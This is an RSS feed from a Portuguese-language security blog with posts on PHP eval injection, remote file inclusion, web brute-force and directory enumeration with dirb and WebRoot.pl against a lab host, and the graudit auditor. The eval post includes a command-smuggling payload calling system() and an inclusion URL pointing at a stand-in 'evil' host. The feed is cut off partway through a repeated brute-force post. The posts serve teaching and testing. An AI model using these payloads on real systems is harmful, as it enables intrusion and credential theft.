<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>RootSecurity</title>
	<atom:link href="http://y2h4ck.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://y2h4ck.wordpress.com</link>
	<description>Penetration Testing &#38; Security Articles - Defcon Group 55111</description>
	<lastBuildDate>Fri, 16 Dec 2011 16:27:42 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='y2h4ck.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>RootSecurity</title>
		<link>http://y2h4ck.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://y2h4ck.wordpress.com/osd.xml" title="RootSecurity" />
	<atom:link rel='hub' href='http://y2h4ck.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Eval()</title>
		<link>http://y2h4ck.wordpress.com/2011/12/16/eval/</link>
		<comments>http://y2h4ck.wordpress.com/2011/12/16/eval/#comments</comments>
		<pubDate>Fri, 16 Dec 2011 16:27:38 +0000</pubDate>
		<dc:creator>y2h4ck</dc:creator>
				<category><![CDATA[Devel]]></category>
		<category><![CDATA[Ethical Hacking]]></category>
		<category><![CDATA[Web Hacking]]></category>

		<guid isPermaLink="false">http://y2h4ck.wordpress.com/?p=422</guid>
		<description><![CDATA[A função eval() é muito utilizada por facilitar a vida de desenvolvedores transformando strings em instruções javascript e executando-as em seguida (desde que a instrução esteja correta). Vejamos abaixo um exemplo de código javascript: &#160; document.getElementById("meubotaovoltar").onclick = function () { if (historicode1 == "home") { //historicode1 é minha variável que recebe o valor do último [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=y2h4ck.wordpress.com&amp;blog=2298308&amp;post=422&amp;subd=y2h4ck&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>A função eval() é muito utilizada por facilitar a vida de desenvolvedores transformando strings em instruções javascript e executando-as em seguida (desde que a instrução esteja correta).</p>
<p>Vejamos abaixo um exemplo de código javascript:</p>
<p>&nbsp;</p>
<p><code>document.getElementById("meubotaovoltar").onclick = function () {</code><br />
<code>if (historicode1 == "home") { //historicode1 é minha variável que recebe o valor do último item clicado</code><br />
<code>location.href="home.htm"; //faz a chamada da página</code><br />
<code>} else if (historicode1 == "contatos") {</code><br />
<code>location.href="contatos.htm"</code><br />
<code>}</code></p>
<p><code> </code></p>
<p>E a seguir o mesmo código acima porém utilizando a função eval():</p>
<p>&nbsp;</p>
<p><code>document.getElementById("meubotaovoltar").onclick = function () {</code><br />
<code>eval("location.href="+historicode1+".htm");</code><br />
<code>}</code></p>
<p><code> </code></p>
<p>A função minimizou totalmente o código. Por tratar o conteúdo de forma dinamica a função Eval() pode ser abusada de varias formas e um dos ataques mais difundidos é o Eval Injection.</p>
<p>Este ataque consiste na injeção de scripts que não são validados de forma apropriada pelo input de dados de usuário como parâmetro no site. Um usuário remoto pode inserir uma URL especialmente criada para enviar dados arbitrários para a função eval(). Isso resultará na execução do código pelo sistema vulneravel.</p>
<p>O ataque irá executar o código com a mesma permissão que o web service está executando no servidor remoto, isso inclui comandos executados no sistema.</p>
<p>&nbsp;</p>
<p>Exemplo 01 : Sistema vulnerável a Eval Injection.</p>
<p>Vejamos o código abaixo:</p>
<p>$myvar = &#8220;varname&#8221;;</p>
<p>$x = $_GET['arg'];</p>
<p>eval(&#8220;\$myvar = \$x;&#8221;);</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>Como pode ser visto acima a variavel $arg é repassada via parametro GET e  em seguida é processada dentro da chamada eval().  Poderiamos explorar facilmente isto setando o valor da variavel para “10; system(\”/bin/passwd\”);”. Neste caso o webserver iria executar o comando no sistema e exibiria todos os usuários do Linux;</p>
<p>&nbsp;</p>
<p>Exemplo 2:  Injetando arquivos remotes para explorar a função vulnerável.</p>
<p>Vejamos o código a seguir:</p>
<p>&nbsp;</p>
<pre>&lt;?php
   $color = 'blue';
   if ( isset( $_GET['COLOR'] ) )
      $color = $_GET['COLOR'];
   require( $color . '.php' );
?&gt;
&lt;form&gt;
   &lt;select name="COLOR"&gt;
      &lt;option value="red"&gt;red&lt;/option&gt;
      &lt;option value="blue"&gt;blue&lt;/option&gt;
   &lt;/select&gt;
   &lt;input type="submit"&gt;
&lt;/form&gt;</pre>
<p>&nbsp;</p>
<p>Colocando red/blue o programador pensou que poderia garantir que somente blue.php e red.php poderiam ser carregados. Porem como qualquer um poderia simplesmente inserir dados arbitrários na variável COLOR, é possivel injetar códigos a partir de arquivos:</p>
<ul>
<li>/vulnerable.php?COLOR=<strong>http://evil/exploit</strong>   : Isto injetaria um arquivo remoto malicioso</li>
<li>/vulnerable.php?COLOR=<strong>C:\ftp\upload\exploit : Isto poderia carregar um arquivo que foi feito upload para o server.</strong></li>
</ul>
<p>&nbsp;</p>
<p>Como podem ver as vulnerabilidades relacionadas a dados inseridos como variáveis não validadas podem trazer diversos problemas, em especial a função eval() por ser utilizada em larga escala pode prejudicar consideravelmente a segurança de sua aplicação e servidores.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/y2h4ck.wordpress.com/422/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/y2h4ck.wordpress.com/422/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/y2h4ck.wordpress.com/422/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/y2h4ck.wordpress.com/422/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/y2h4ck.wordpress.com/422/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/y2h4ck.wordpress.com/422/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/y2h4ck.wordpress.com/422/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/y2h4ck.wordpress.com/422/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/y2h4ck.wordpress.com/422/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/y2h4ck.wordpress.com/422/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/y2h4ck.wordpress.com/422/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/y2h4ck.wordpress.com/422/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/y2h4ck.wordpress.com/422/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/y2h4ck.wordpress.com/422/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=y2h4ck.wordpress.com&amp;blog=2298308&amp;post=422&amp;subd=y2h4ck&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://y2h4ck.wordpress.com/2011/12/16/eval/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">y2h4ck</media:title>
		</media:content>
	</item>
		<item>
		<title>Web Application Brute-Force Attacks.</title>
		<link>http://y2h4ck.wordpress.com/2011/12/08/web-application-brute-force-attacks/</link>
		<comments>http://y2h4ck.wordpress.com/2011/12/08/web-application-brute-force-attacks/#comments</comments>
		<pubDate>Thu, 08 Dec 2011 16:19:45 +0000</pubDate>
		<dc:creator>y2h4ck</dc:creator>
				<category><![CDATA[Devel]]></category>
		<category><![CDATA[Ethical Hacking]]></category>
		<category><![CDATA[Web Hacking]]></category>

		<guid isPermaLink="false">http://y2h4ck.wordpress.com/?p=419</guid>
		<description><![CDATA[&#160; O ataque de Brute-force sempre foi muito comum em serviços disponibilizados remotamente tais quais, ftp, smtp, pop entre outros. Em geral este ataque por si só não apresenta um risco muito grave, porém pode ser utilizado como vetor para ataques mais complexos que podem explorar falhas na infra-estrutura que vão desde políticas mal configuradas [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=y2h4ck.wordpress.com&amp;blog=2298308&amp;post=419&amp;subd=y2h4ck&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>&nbsp;</p>
<p>O ataque de Brute-force sempre foi muito comum em serviços disponibilizados remotamente tais quais, ftp, smtp, pop entre outros. Em geral este ataque por si só não apresenta um risco muito grave, porém pode ser utilizado como vetor para ataques mais complexos que podem explorar falhas na infra-estrutura que vão desde políticas mal configuradas de permissões, política de senha ineficiente ou inexistente entre outras.</p>
<p>Durante este tipo de ataque, o atacante tenta transpor mecanismos de segurança como por exemplo sistemas de autenticação, proteção de diretórios por senha e etc, tendo como base um mínimo conhecimento sobre o alvo.</p>
<p>Existem basicamente 2 métodos que podem ser empregados neste tipo de ataque o ataque de dicionário e o de força-bruta.</p>
<p><strong>Dicionário</strong>: O atacante utiliza um catalogo pré-formatado onde no caso são utilizadas strings que contém possíveis resultados e que em geral utilizam senhas padrão comumente utilizadas, nomes de pastas utilizadas e etc. Em geral este tipo de ataque tende a ser direcionado.</p>
<p><strong>Força-Bruta</strong>: O atacante utiliza classes de caracteres ex: alfanumerica, especiais, case sensitive e etc. Neste caso específico este tipo de método demanda muito tempo e seu percentual de aproveitamento é muito baixo assim como gera muito alarde durante o ataque fazendo com que possíveis mecanismos de segurança como IDSs, IPSs e etc sejam acionados.</p>
<p>&nbsp;</p>
<p>Em sua grande maioria ataques de brute-force são utilizados para conseguir senhas de usuários para controle de acesso de aplicações e sistemas. Entretanto existem diversas ferramentas que utiliza esta técnica para examinar web services, procurar pastas contendo arquivos que possam conter senhas de banco de dados, assim como testar como a aplicação se comporta utilizando diferentes data forms (GET/POST) assim como identificar Session-IDs de usuários. Especialmente em aplicações web o ataque de brute-force pode ser utilizado para</p>
<p>- Conseguir cookies de acesso a sessões de usuários;</p>
<p>- Usuários e senhas de diretórios protegidos;</p>
<p>- SessionID de aplicações;</p>
<p>- Arquivos de include contendo dados sensíveis como senhas de banco de dados entre outras.</p>
<p>Veremos abaixo alguns exemplos de ferramentas que podem ajudar durante o teste de aplicações web e descobrir se estamos vulneraveis a este tipo de ataque.</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>Para testes em serviços web existem 2 ferramentas  interesssantes:</p>
<p><strong>-dirb</strong> (<a href="http://sourceforge.net/projects/dirb">http://sourceforge.net/projects/dirb</a>)</p>
<p><strong>-webroot</strong> (<a href="http://www.cirt.dk/tools/webroot/WebRoot.txt">http://www.cirt.dk/tools/webroot/WebRoot.txt</a>)</p>
<p>&nbsp;</p>
<p>A ferramenta dirb consiste em uma ferramenta com opções mais avançadas e pode ser utilizada para:</p>
<p>- setar diferentes cookies</p>
<p>- adicionar qualquer tipo de HTTP header desejado</p>
<p>- utilizar proxys para mascarar a conexão</p>
<p>- Utilizar catalogos ou arquivos utilizando dicionários definidos ou templates fazendo uma varredura direcionada.</p>
<p>Podemos fazer um teste simples utilizando-a:</p>
<p>[root@localhost /]$  ./dirb http://laboratorio.test/</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>DIRB v1.9</p>
<p>By The Dark Raver</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>START_TIME: Mon Jul  9 23:13:16 2007</p>
<p>URL_BASE: http://laboratorio.test/</p>
<p>WORDLIST_FILES: wordlists/common.txt</p>
<p>SERVER_BANNER: apache/3.2.2</p>
<p>NOT_EXISTANT_CODE: 404 [NOT FOUND]</p>
<p>(Location: &#8221; &#8211; Size: 345)</p>
<p>&nbsp;</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>&nbsp;</p>
<p>Generating Wordlist&#8230;</p>
<p>Generated Words: 839</p>
<p>&nbsp;</p>
<p>&#8212;- Scanning URL: http://laboratorio.test/ &#8212;-</p>
<p>FOUND: http://laboratorio.test/phpmyadmin/</p>
<p>(***) DIRECTORY (*)</p>
<p>&nbsp;</p>
<p><strong> </strong></p>
<p>No output da ferramenta somos informados que a pasta phpmyadmin/  foi encontrada. Um atacante poderia agora efetuar um ataque direcionado para a aplicação PHPMyAdmin, como por exemplo tentar senhas de acesso default ou utilizar exploits para a versão em uso do PHPmyAdmin.</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>Um dos maiores problemas com ferramentas como o dirb é reconhecer se a mensagem de retorno do servidor  é a esperada ou não. Em casos onde o servidor  tem configurações avançadas (exemplo utilizando mod_rewrite) ferramentas automaticas não conseguem distinguir uma mensagem de resposta do servidor  sobre um determinado erro ao acessar uma pasta ou arquivo.</p>
<p>A aplicação WebRoot.pl escrita pelo CIRT.DK, tem mecanismos embutidos para trabalhar as respostas do servidor,  e baseado na frase especificada pelo atacante, consegue identificar se a resposta do servidor  é a esperada ou não.</p>
<p>./WebRoot.pl -noupdate -host laboratorio.test -port 80 -verbose -match &#8220;senha&#8221; -url &#8220;/private/&lt;BRUTE&gt;&#8221; -incremental lowercase -minimum 1 -maximum 1</p>
<p>&nbsp;</p>
<p>oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00</p>
<p>o          Webserver Bruteforcing 1.8          o</p>
<p>0  ************* !!! WARNING !!! ************  0</p>
<p>0  ******* FOR PENETRATION USE ONLY *********  0</p>
<p>0  ******************************************  0</p>
<p>o       (c)2007 by Dennis Rand &#8211; CIRT.DK       o</p>
<p>oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00</p>
<p>[X] Checking for updates                &#8211; NO CHECK</p>
<p>[X] Checking for False Positive Scan    &#8211; OK</p>
<p>[X] Using Incremental                   &#8211; OK</p>
<p>[X] Starting Scan                       &#8211; OK</p>
<p>GET /private/b HTTP/1.1</p>
<p>GET /private/z HTTP/1.1</p>
<p>[X] Scan complete                       - OK</p>
<p>[X] Total attempts                      &#8211; 26</p>
<p>[X] Sucessfull attempts                 &#8211; 1</p>
<p>oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00</p>
<p>WebRoot.pl encontrou um arquivo /private/b no laboratorio.test, que contem a frase “senha: 123mudar”</p>
<p><strong>Ferramentas para Identificar e proteger contra brute-forc e em aplicações Web.</strong></p>
<p><strong>Php-Brute-Force-Attack Detector</strong></p>
<p><a title="http://yehg.net/lab/pr0js/files.php/php_brute_force_detect.zip" href="http://yehg.net/lab/pr0js/files.php/php_brute_force_detect.zip">http://yehg.net/lab/pr0js/files.php/php_brute_force_detect.zip</a></p>
<p>Esta ferramenta detecta se seu servidor esta sendo scanniado por ferramentas de brute-force como  WFuzz, Owasp DirBuster e scans e vulnerabilidades como Nessus, Nikto, Acunetix, etc. Ela pode ajudar você a rapidamente identificar possíveis hosts utilizados por atacantes que ficam efetuando testes em sua aplicações para identificar brechas e possíveis falhas de segurança</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/y2h4ck.wordpress.com/419/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/y2h4ck.wordpress.com/419/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/y2h4ck.wordpress.com/419/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/y2h4ck.wordpress.com/419/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/y2h4ck.wordpress.com/419/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/y2h4ck.wordpress.com/419/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/y2h4ck.wordpress.com/419/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/y2h4ck.wordpress.com/419/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/y2h4ck.wordpress.com/419/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/y2h4ck.wordpress.com/419/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/y2h4ck.wordpress.com/419/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/y2h4ck.wordpress.com/419/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/y2h4ck.wordpress.com/419/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/y2h4ck.wordpress.com/419/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=y2h4ck.wordpress.com&amp;blog=2298308&amp;post=419&amp;subd=y2h4ck&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://y2h4ck.wordpress.com/2011/12/08/web-application-brute-force-attacks/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">y2h4ck</media:title>
		</media:content>
	</item>
		<item>
		<title>Start your Engines &#8230;</title>
		<link>http://y2h4ck.wordpress.com/2011/12/05/start-on-your-engines/</link>
		<comments>http://y2h4ck.wordpress.com/2011/12/05/start-on-your-engines/#comments</comments>
		<pubDate>Mon, 05 Dec 2011 13:09:10 +0000</pubDate>
		<dc:creator>y2h4ck</dc:creator>
				<category><![CDATA[General Hacking]]></category>

		<guid isPermaLink="false">http://y2h4ck.wordpress.com/?p=415</guid>
		<description><![CDATA[Olá pessoal, Depois de muito tempo, tendo que retirar minha atenção do blog, estou de volta. Muitas vezes precisamos apenas de um pequeno incentivo para dar continuidade a certas coisas, e dizer que eu não atualizava o blog por falta de tempo seria no mínimo mentira de minha parte. Porém aqui estou, e para ficar. [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=y2h4ck.wordpress.com&amp;blog=2298308&amp;post=415&amp;subd=y2h4ck&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Olá pessoal,</p>
<p>Depois de muito tempo, tendo que retirar minha atenção do blog, estou de volta.</p>
<p>Muitas vezes precisamos apenas de um pequeno incentivo para dar continuidade a certas coisas, e dizer que eu não atualizava o blog por falta de tempo seria no mínimo mentira de minha parte.</p>
<p>Porém aqui estou, e para ficar.</p>
<p>Irei postar novos artigos no mínimo uma vez por semana. Espero que os senhores apreciem.</p>
<p>Happy Hacking 4 You ! :)</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/y2h4ck.wordpress.com/415/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/y2h4ck.wordpress.com/415/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/y2h4ck.wordpress.com/415/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/y2h4ck.wordpress.com/415/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/y2h4ck.wordpress.com/415/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/y2h4ck.wordpress.com/415/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/y2h4ck.wordpress.com/415/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/y2h4ck.wordpress.com/415/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/y2h4ck.wordpress.com/415/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/y2h4ck.wordpress.com/415/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/y2h4ck.wordpress.com/415/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/y2h4ck.wordpress.com/415/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/y2h4ck.wordpress.com/415/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/y2h4ck.wordpress.com/415/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=y2h4ck.wordpress.com&amp;blog=2298308&amp;post=415&amp;subd=y2h4ck&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://y2h4ck.wordpress.com/2011/12/05/start-on-your-engines/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">y2h4ck</media:title>
		</media:content>
	</item>
		<item>
		<title>Graudit &#8211; Source Code Static Auditor</title>
		<link>http://y2h4ck.wordpress.com/2010/08/10/graudit-source-code-static-auditor/</link>
		<comments>http://y2h4ck.wordpress.com/2010/08/10/graudit-source-code-static-auditor/#comments</comments>
		<pubDate>Tue, 10 Aug 2010 15:30:01 +0000</pubDate>
		<dc:creator>y2h4ck</dc:creator>
				<category><![CDATA[General Hacking]]></category>

		<guid isPermaLink="false">http://y2h4ck.wordpress.com/?p=405</guid>
		<description><![CDATA[GRAUDIT Graudit is a simple script and signature sets that allows you to find potential security flaws in source code using the GNU utility grep. It&#8217;s comparable to other static analysis applications like RATS, SWAAT and flaw-finder while keeping the technical requirements to a minimum and being very flexible. Graudit supports scanning code written in [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=y2h4ck.wordpress.com&amp;blog=2298308&amp;post=405&amp;subd=y2h4ck&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><strong>GRAUDIT</strong><br />
Graudit is a simple script and signature sets that allows you to find  potential security flaws in source code using the GNU utility grep. It&#8217;s  comparable to other static analysis applications like RATS, SWAAT and  flaw-finder while keeping the technical requirements to a minimum and  being very flexible.</p>
<p>Graudit supports scanning code written in several languages; asp, jsp, perl, php and python.</p>
<p><strong>USAGE</strong><br />
Graudit supports several options and tries to follow good shell practices. For<br />
a list of the options you can run graudit -h or see below. The simplest way to use<br />
graudit is;<br />
<code>graudit /path/to/scan</code></p>
<p><strong>DEPENDENCIES<br />
</strong>Required: <strong>bash</strong>, <strong>grep</strong>, <strong>sed</strong></p>
<p><strong>DOCUMENTATION</strong><br />
See the readme file and <a href="http://www.justanotherhacker.com/projects/graudit/frequently-asked-questions.html">frequently asked questions</a>.<br />
<strong>DOWNLOAD</strong><br />
You can download the latest version from the <a href="http://www.justanotherhacker.com/projects/graudit/download.html">graudit download</a> page.</p>
<p><strong>SOURCE</strong><br />
Graudit is available from github, you can check the <a href="http://github.com/wireghoul/graudit/">github project page</a> or check it out directly using git from <a href="//github.com/wireghoul/graudit.git">git://github.com/wireghoul/graudit.git</a>﻿</p>
<p><strong>SCREENSHOT</strong></p>
<p><strong><img class="alignnone" title="http://www.justanotherhacker.com/graudit-1.1-screenshot.jpg" src="http://www.justanotherhacker.com/graudit-1.1-screenshot.jpg" alt="" width="536" height="335" /><br />
</strong></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/y2h4ck.wordpress.com/405/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/y2h4ck.wordpress.com/405/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/y2h4ck.wordpress.com/405/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/y2h4ck.wordpress.com/405/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/y2h4ck.wordpress.com/405/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/y2h4ck.wordpress.com/405/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/y2h4ck.wordpress.com/405/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/y2h4ck.wordpress.com/405/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/y2h4ck.wordpress.com/405/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/y2h4ck.wordpress.com/405/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/y2h4ck.wordpress.com/405/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/y2h4ck.wordpress.com/405/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/y2h4ck.wordpress.com/405/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/y2h4ck.wordpress.com/405/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=y2h4ck.wordpress.com&amp;blog=2298308&amp;post=405&amp;subd=y2h4ck&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://y2h4ck.wordpress.com/2010/08/10/graudit-source-code-static-auditor/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">y2h4ck</media:title>
		</media:content>

		<media:content url="http://www.justanotherhacker.com/graudit-1.1-screenshot.jpg" medium="image">
			<media:title type="html">http://www.justanotherhacker.com/graudit-1.1-screenshot.jpg</media:title>
		</media:content>
	</item>
		<item>
		<title>Ataques de Brute-Force em Aplicações Web</title>
		<link>http://y2h4ck.wordpress.com/2010/03/25/ataques-de-brute-force-em-aplicacoes-web/</link>
		<comments>http://y2h4ck.wordpress.com/2010/03/25/ataques-de-brute-force-em-aplicacoes-web/#comments</comments>
		<pubDate>Thu, 25 Mar 2010 19:20:48 +0000</pubDate>
		<dc:creator>y2h4ck</dc:creator>
				<category><![CDATA[General Hacking]]></category>

		<guid isPermaLink="false">http://y2h4ck.wordpress.com/?p=400</guid>
		<description><![CDATA[O ataque de Brute-force sempre foi muito comum em serviços disponibilizados remotamente tais quais, ftp, smtp, pop entre outros. Em geral este ataque por si só não apresenta um risco muito grave, porém pode ser utilizado como vetor para ataques mais complexos que podem explorar falhas na infra-estrutura que vão desde políticas mal configuradas de [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=y2h4ck.wordpress.com&amp;blog=2298308&amp;post=400&amp;subd=y2h4ck&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>O ataque de Brute-force sempre foi muito comum em serviços disponibilizados remotamente tais quais, ftp, smtp, pop entre outros. Em geral este ataque por si só não apresenta um risco muito grave, porém pode ser utilizado como vetor para ataques mais complexos que podem explorar falhas na infra-estrutura que vão desde políticas mal configuradas de permissões, política de senha ineficiente ou inexistente entre outras.</p>
<p>Durante este tipo de ataque, o atacante tenta transpor mecanismos de segurança como por exemplo sistemas de autenticação, proteção de diretórios por senha e etc, tendo como base um mínimo conhecimento sobre o alvo.</p>
<p>Existem basicamente 2 métodos que podem ser empregados neste tipo de ataque o ataque de dicionário e o de força-bruta.</p>
<p><strong>Dicionário</strong>: O atacante utiliza um catalogo pré-formatado onde no caso são utilizadas strings que contém possíveis resultados e que em geral utilizam senhas padrão comumente utilizadas, nomes de pastas utilizadas e etc. Em geral este tipo de ataque tende a ser direcionado.</p>
<p><strong>Força-Bruta</strong>: O atacante utiliza classes de caracteres ex: alfanumerica, especiais, case sensitive e etc. Neste caso específico este tipo de método demanda muito tempo e seu percentual de aproveitamento é muito baixo assim como gera muito alarde durante o ataque fazendo com que possíveis mecanismos de segurança como IDSs, IPSs e etc sejam acionados.</p>
<p>Em sua grande maioria ataques de brute-force são utilizados para conseguir senhas de usuários para controle de acesso de aplicações e sistemas. Entretanto existem diversas ferramentas que utiliza esta técnica para examinar web services, procurar pastas contendo arquivos que possam conter senhas de banco de dados, assim como testar como a aplicação se comporta utilizando diferentes data forms (GET/POST) assim como identificar Session-IDs de usuários. Especialmente em aplicações web o ataque de brute-force pode ser utilizado para</p>
<p>- Conseguir cookies de acesso a sessões de usuários;</p>
<p>- Usuários e senhas de diretórios protegidos;</p>
<p>- SessionID de aplicações;</p>
<p>- Arquivos de include contendo dados sensíveis como senhas de banco de dados entre outras.</p>
<p>Veremos abaixo alguns exemplos de ferramentas que podem ajudar durante o teste de aplicações web e descobrir se estamos vulneraveis a este tipo de ataque.</p>
<p>Para testes em serviços web existem 2 ferramentas  interesssantes:</p>
<p><strong>-dirb</strong> (<a href="http://sourceforge.net/projects/dirb">http://sourceforge.net/projects/dirb</a>)</p>
<p><strong>-webroot</strong> (<a href="http://www.cirt.dk/tools/webroot/WebRoot.txt">http://www.cirt.dk/tools/webroot/WebRoot.txt</a>)</p>
<p>A ferramenta dirb consiste em uma ferramenta com opções mais avançadas e pode ser utilizada para:</p>
<p>- setar diferentes cookies</p>
<p>- adicionar qualquer tipo de HTTP header desejado</p>
<p>- utilizar proxys para mascarar a conexão</p>
<p>- Utilizar catalogos ou arquivos utilizando dicionários definidos ou templates fazendo uma varredura direcionada.</p>
<p>Podemos fazer um teste simples utilizando-a:</p>
<p>[root@localhost /]$  ./dirb http://laboratorio.test/</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>DIRB v1.9</p>
<p>By The Dark Raver</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>START_TIME: Mon Jul  9 23:13:16 2007</p>
<p>URL_BASE: http://laboratorio.test/</p>
<p>WORDLIST_FILES: wordlists/common.txt</p>
<p>SERVER_BANNER: apache/3.2.2</p>
<p>NOT_EXISTANT_CODE: 404 [NOT FOUND]</p>
<p>(Location: &#8221; &#8211; Size: 345)</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>Generating Wordlist&#8230;</p>
<p>Generated Words: 839</p>
<p>&#8212;- Scanning URL: http://laboratorio.test/ &#8212;-</p>
